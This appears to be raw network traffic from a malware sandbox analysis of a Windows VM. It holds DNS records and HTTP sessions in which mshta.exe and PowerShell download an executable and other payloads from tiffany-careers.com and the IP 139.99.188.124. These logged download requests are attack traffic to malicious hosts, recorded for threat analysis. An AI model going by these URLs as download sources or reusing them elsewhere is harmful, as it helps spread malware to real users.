                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.229037046 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.229296923 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.750926971 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.751162052 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.066102028 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.068835974 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.068991899 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.073051929 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.233613014 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.234158039 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235172987 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.235799074 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.550318003 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.551232100 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.551512003 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.551826000 CET44361829172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552067041 CET61829443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552534103 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552694082 CET44362535172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.552992105 CET62535443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:28.292737007 CET6243553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:28.429862022 CET53624351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:48.814301014 CET5753453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Dec 18, 2024 21:06:48.952970028 CET53575341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421274900 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421459913 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421722889 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:14.421843052 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.434868097 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.434988976 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.435703039 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.435741901 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.524097919 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.605530977 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.605530977 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.745708942 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.745708942 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749471903 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749501944 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749536037 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749552011 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.749572039 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.756583929 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.762254953 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.766504049 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.774019003 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.775127888 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.919696093 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:15.953097105 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.061093092 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.062858105 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.071542025 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.072312117 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.074441910 CET51385443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.076246023 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.090208054 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.090245008 CET44351385172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:07:16.121869087 CET51385443192.168.2.6172.64.41.3
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 18, 2024 21:06:15.564013958 CET | 192.168.2.6 | 1.1.1.1 | c24c | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 21:06:00.246495962 CET | 192.168.2.6 | 1.1.1.1 | 0xb723 | Standard query (0) | tiffany-careers.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:13.659888983 CET | 192.168.2.6 | 1.1.1.1 | 0x7238 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:13.660047054 CET | 192.168.2.6 | 1.1.1.1 | 0xd900 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.269711971 CET | 192.168.2.6 | 1.1.1.1 | 0x83f | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.270020962 CET | 192.168.2.6 | 1.1.1.1 | 0xb34e | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.270435095 CET | 192.168.2.6 | 1.1.1.1 | 0x9d4c | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.270764112 CET | 192.168.2.6 | 1.1.1.1 | 0xf26c | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.298217058 CET | 192.168.2.6 | 1.1.1.1 | 0x1960 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.298556089 CET | 192.168.2.6 | 1.1.1.1 | 0xefb3 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.314865112 CET | 192.168.2.6 | 1.1.1.1 | 0xde4d | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.315074921 CET | 192.168.2.6 | 1.1.1.1 | 0x6083 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:28.292737007 CET | 192.168.2.6 | 1.1.1.1 | 0xf952 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:48.814301014 CET | 192.168.2.6 | 1.1.1.1 | 0x613 | Standard query (0) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 21:05:54.737921000 CET | 1.1.1.1 | 192.168.2.6 | 0x11a9 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:05:54.737921000 CET | 1.1.1.1 | 192.168.2.6 | 0x11a9 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:00.385514021 CET | 1.1.1.1 | 192.168.2.6 | 0xb723 | No error (0) | tiffany-careers.com | | 147.45.49.155 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:11.487927914 CET | 1.1.1.1 | 192.168.2.6 | 0xe970 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:11.487927914 CET | 1.1.1.1 | 192.168.2.6 | 0xe970 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:11.577888012 CET | 1.1.1.1 | 192.168.2.6 | 0x90d1 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:13.797019005 CET | 1.1.1.1 | 192.168.2.6 | 0xd900 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:13.893244028 CET | 1.1.1.1 | 192.168.2.6 | 0x7238 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:15.406610012 CET | 1.1.1.1 | 192.168.2.6 | 0x83f | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.406610012 CET | 1.1.1.1 | 192.168.2.6 | 0x83f | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.406758070 CET | 1.1.1.1 | 192.168.2.6 | 0xb34e | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.407212019 CET | 1.1.1.1 | 192.168.2.6 | 0x9d4c | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.407212019 CET | 1.1.1.1 | 192.168.2.6 | 0x9d4c | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.407545090 CET | 1.1.1.1 | 192.168.2.6 | 0xf26c | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.435058117 CET | 1.1.1.1 | 192.168.2.6 | 0x1960 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.435058117 CET | 1.1.1.1 | 192.168.2.6 | 0x1960 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.435391903 CET | 1.1.1.1 | 192.168.2.6 | 0xefb3 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 18, 2024 21:06:15.452119112 CET | 1.1.1.1 | 192.168.2.6 | 0xde4d | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:15.452119112 CET | 1.1.1.1 | 192.168.2.6 | 0xde4d | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.181.65 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:15.560724974 CET | 1.1.1.1 | 192.168.2.6 | 0x6083 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:28.429862022 CET | 1.1.1.1 | 192.168.2.6 | 0xf952 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:48.952970028 CET | 1.1.1.1 | 192.168.2.6 | 0x613 | Name error (3) | nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:52.053039074 CET | 1.1.1.1 | 192.168.2.6 | 0xcf37 | No error (0) | g-bing-com.ax-0001.ax-msedge.net | ax-0001.ax-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 21:06:52.053039074 CET | 1.1.1.1 | 192.168.2.6 | 0xcf37 | No error (0) | ax-0001.ax-msedge.net | | 150.171.27.10 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:06:52.053039074 CET | 1.1.1.1 | 192.168.2.6 | 0xcf37 | No error (0) | ax-0001.ax-msedge.net | | 150.171.28.10 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:13.341713905 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:13.341713905 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:14.339647055 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:14.339647055 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:15.346571922 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:15.346571922 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:17.354132891 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:17.354132891 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:21.407203913 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 21:07:21.407203913 CET | 1.1.1.1 | 192.168.2.6 | 0xd0b3 | No error (0) | fg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                  • tiffany-careers.com
                                                                                                                                                                                                                  • tse1.mm.bing.net
                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                  • 139.99.188.124
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49776 | 139.99.188.124 | 80 | 5612 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 21:06:16.339706898 CET | 164 | OUT |
GET /kiiMf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 139.99.188.124
Connection: Keep-Alive

Dec 18, 2024 21:06:17.835608959 CET | 1236 | IN |
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:06:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
ETag: "da2a8-6294c8abc9816"
Accept-Ranges: bytes
Content-Length: 893608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49802 | 139.99.188.124 | 80 | 9152 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 21:06:21.466746092 CET | 76 | OUT |
GET /QWCheljD.txt HTTP/1.1
Host: 139.99.188.124
Connection: Keep-Alive

Dec 18, 2024 21:06:22.973509073 CET | 1236 | IN |
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 20:06:22 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
ETag: "12ec22-6294c8abc8478"
Accept-Ranges: bytes
Content-Length: 1240098
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID  Source IP    Source Port  Destination IP  Destination Port
0           192.168.2.6  49708        20.198.118.190  443

Timestamp  Bytes transferred  Direction  Data

2024-12-18 20:05:53 UTC  71  OUT
Data Ascii:
CNT 1 CON 305
MS-CV: za+Hn/1JV0i4+oYl.1
Context: dff25f341e7dbf4e

2024-12-18 20:05:53 UTC  249  OUT
Data Ascii:
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>

2024-12-18 20:05:53 UTC  1084  OUT
Data Ascii:
ATH 2 CON\DEVICE 1061
MS-CV: za+Hn/1JV0i4+oYl.2
Context: dff25f341e7dbf4e

<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz

2024-12-18 20:05:53 UTC  74  OUT
Data Ascii:
BND 3 CON\QOS 56
MS-CV: za+Hn/1JV0i4+oYl.3
Context: dff25f341e7dbf4e

2024-12-18 20:05:54 UTC  14  IN
Data Ascii:
202 1 CON 58

2024-12-18 20:05:54 UTC  58  IN
Data Ascii:
MS-CV: HvQFotQq0EytAij0XDDwWA.0

Payload parsing failed.


Session ID  Source IP    Source Port  Destination IP  Destination Port
1           192.168.2.6  49714        20.198.118.190  443

Timestamp  Bytes transferred  Direction  Data

2024-12-18 20:06:00 UTC  71  OUT
Data Ascii:
CNT 1 CON 305
MS-CV: IX/A5KsP006QQzHm.1
Context: c03db6a9c619c477

2024-12-18 20:06:00 UTC  249  OUT
Data Ascii:
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>

2024-12-18 20:06:00 UTC  1084  OUT
Data Ascii:
ATH 2 CON\DEVICE 1061
MS-CV: IX/A5KsP006QQzHm.2
Context: c03db6a9c619c477

<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz

2024-12-18 20:06:00 UTC  74  OUT
Data Ascii:
BND 3 CON\QOS 56
MS-CV: IX/A5KsP006QQzHm.3
Context: c03db6a9c619c477

2024-12-18 20:06:00 UTC  14  IN
Data Ascii:
202 1 CON 58

2024-12-18 20:06:00 UTC  58  IN
Data Ascii:
MS-CV: F46Vmu/tQE6ui741D4SVHw.0

Payload parsing failed.


Session ID  Source IP    Source Port  Destination IP  Destination Port
2           192.168.2.6  49715        20.198.118.190  443

Timestamp  Bytes transferred  Direction  Data

2024-12-18 20:06:01 UTC  71  OUT
Data Ascii:
CNT 1 CON 305
MS-CV: 6nL8WeJYkEWwlMEd.1
Context: 2c55413ca0a19334

2024-12-18 20:06:01 UTC  249  OUT
Data Ascii:
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>

2024-12-18 20:06:01 UTC  1084  OUT
Data Ascii:
ATH 2 CON\DEVICE 1061
MS-CV: 6nL8WeJYkEWwlMEd.2
Context: 2c55413ca0a19334

<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz

2024-12-18 20:06:01 UTC  218  OUT
Data Ascii:
BND 3 CON\WNS 0 197
MS-CV: 6nL8WeJYkEWwlMEd.3
Context: 2c55413ca0a19334

<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>

2024-12-18 20:06:02 UTC  14  IN
Data Ascii:
202 1 CON 58

2024-12-18 20:06:02 UTC  58  IN
Data Ascii:
MS-CV: cjYsODy4AEK4bq4n1uI3lA.0

Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49716 | 147.45.49.155 | 443 | 1476 | C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:01 UTC | 330 | OUT | GET /FILEANH HTTP/1.1
Accept: */*
Accept-Language: en-CH
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-18 20:06:02 UTC | 396 | IN | HTTP/1.1 200 OK
etag: "1328a-675f00db-25387;;;"
last-modified: Sun, 15 Dec 2024 16:16:27 GMT
content-length: 78474
accept-ranges: bytes
date: Wed, 18 Dec 2024 20:06:02 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close
2024-12-18 20:06:02 UTC | 16384 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$WWWCVCUCCCPWsCVC|VCVRichWPELC05


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49724 | 147.45.49.155 | 443 | 612 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:06 UTC | 82 | OUT | GET /New_2025.webp HTTP/1.1
Host: tiffany-careers.com
Connection: Keep-Alive
2024-12-18 20:06:07 UTC | 502 | IN | HTTP/1.1 200 OK
cache-control: public, max-age=604800
expires: Wed, 25 Dec 2024 20:06:07 GMT
etag: "2ddde-675eff09-25386;;;"
last-modified: Sun, 15 Dec 2024 16:08:41 GMT
content-type: image/webp
content-length: 187870
accept-ranges: bytes
date: Wed, 18 Dec 2024 20:06:07 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49731 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:09 UTC | 346 | OUT | GET /th?id=OADD2.10239340418563_16RSKIH5RQZW91ZBH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-18 20:06:09 UTC | 854 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 324887
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 19671E7DE1F04E4CB3BD64CBC0BCE967 Ref B: EWR30EDGE1105 Ref C: 2024-12-18T20:06:09Z
Date: Wed, 18 Dec 2024 20:06:09 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49733 | 150.171.28.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-18 20:06:09 UTC | 375 | OUT | GET /th?id=OADD2.10239340418564_10W6V5F7I280O8R44&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-18 20:06:09 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 427192
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: A2842FE48CDE4E27BFDF091C56E1F7A0 Ref B: EWR311000108051 Ref C: 2024-12-18T20:06:09Z
Date: Wed, 18 Dec 2024 20:06:08 GMT
Connection: close
                                                                                                                                                                                                                  Data Ascii: DcZsA#]<D[ZggB7I#qI.*d#SX(i^|;wL{iTK~{?mo7Y~Z_l{ZT8*vf#jIT*ZO7E|52^_ZTUacJFS{Mf[M
